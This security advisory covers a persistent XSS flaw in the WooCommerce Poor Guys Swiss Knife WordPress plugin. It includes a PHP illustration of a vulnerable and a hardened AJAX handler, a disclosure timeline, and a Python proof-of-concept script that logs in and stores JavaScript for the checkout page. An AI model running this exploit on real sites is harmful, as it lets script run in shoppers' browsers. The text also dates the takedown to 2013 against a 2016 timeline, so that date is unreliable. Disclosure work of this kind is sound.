WooCommerce Poor Guys Swiss Knife [Persistent XSS]

WooCommerce Poor Guys Swiss Knife plugin for WordPress suffers from a Persistent XSS vulnerability

Description

WooCommerce Poor Guys Swiss Knife plugin for WordPress suffers from a Persistent XSS vulnerability. The plugin registers a wp_ajax action used to save JS code that is later included in the checkout page. The handler does not check for appropriate user capabilities before saving the submitted JS code, so any registered user can call this action. Once saved, the JS code is served to every user who visits the checkout page.

The attacker must have a valid user account to exploit this vulnerability, but since this plugin is a WooCommerce enhancement and WooCommerce sites will have user registration open in most cases, acquiring a valid account should be trivial.
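The missing check described above, shown as an added illustration rather than the plugin's own source: a handler of the vulnerable shape next to a hardened one that verifies a nonce and a capability before storing site-wide script. The action name and POST field are taken from the advisory; the option name, function names and nonce action are assumed.

```php
<?php
// Illustrative wp_ajax handler for storing checkout JS. Not the plugin's
// actual code: only the hook name and the 'checkoutjs' field come from
// the advisory; 'wcpgsk_checkoutjs' and the function names are assumed.

// Vulnerable shape: every logged-in user reaches wp_ajax_* hooks, and
// nothing here verifies intent (nonce) or privilege (capability), so the
// submitted value is stored and later echoed to all checkout visitors.
function wcpgsk_save_checkoutjs_unsafe() {
    update_option( 'wcpgsk_checkoutjs', $_POST['checkoutjs'] );
    echo 'js saved';
    wp_die();
}

// Hardened shape. Storing arbitrary JS is by design a privileged action,
// so the fix is to restrict who may set it, not to HTML-escape the value
// (escaping would break the feature the setting exists for).
function wcpgsk_save_checkoutjs_safe() {
    // Rejects requests without a valid nonce (CSRF protection).
    check_ajax_referer( 'wcpgsk_save_checkoutjs', 'nonce' );

    // Only administrators (manage_options) may change site-wide script.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $js = isset( $_POST['checkoutjs'] ) ? wp_unslash( $_POST['checkoutjs'] ) : '';
    update_option( 'wcpgsk_checkoutjs', $js );
    wp_send_json_success( 'js saved' );
}

// Register only the hardened handler.
add_action( 'wp_ajax_wcpgsk_save_checkoutjs', 'wcpgsk_save_checkoutjs_safe' );
```

When auditing a plugin, every `add_action( 'wp_ajax_...' )` callback (as opposed to `wp_ajax_nopriv_...`) should be read with the assumption that any subscriber-level account can reach it.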

PoC

#!/usr/bin/python3

################################################################################
# WooCommerce Poor Guys Swiss Knife - Persistent XSS Exploit
#
# Author: Pan Vag
# Site: http://local-cluster.com
################################################################################

import requests

baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
ajaxUrl = baseUrl + '/wp-admin/admin-ajax.php'

loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

s = requests.Session()

r = s.post(loginUrl, loginPostData)

if r.status_code != 200:
    print('Login error')
    exit(1)

data = {
    'action': 'wcpgsk_save_checkoutjs',
    'checkoutjs': 'alert("XSS")'
}

r = s.post(ajaxUrl, data)

if r.text == 'js saved':
    print('Success')
else:
    print('Error')

exit(0)

Solution

As of March 2013 the plugin author has taken down the plugin home page. The plugin author never responded to our attempts to make contact, so the only reasonable assumption is that this plugin is discontinued.

The only available solution is to remove this plugin from affected websites.


TIMELINE
  • 2016-02-13: Requested CVE ID
  • 2016-02-14: Vendor notified through wordpress.org support forums
  • 2016-02-25: No response from the author. Notified wordpress.org security team about this issue
  • 2016-02-27: Plugin taken down by the wordpress.org plugins team
  • 2016-03-10: Plugin webpage taken down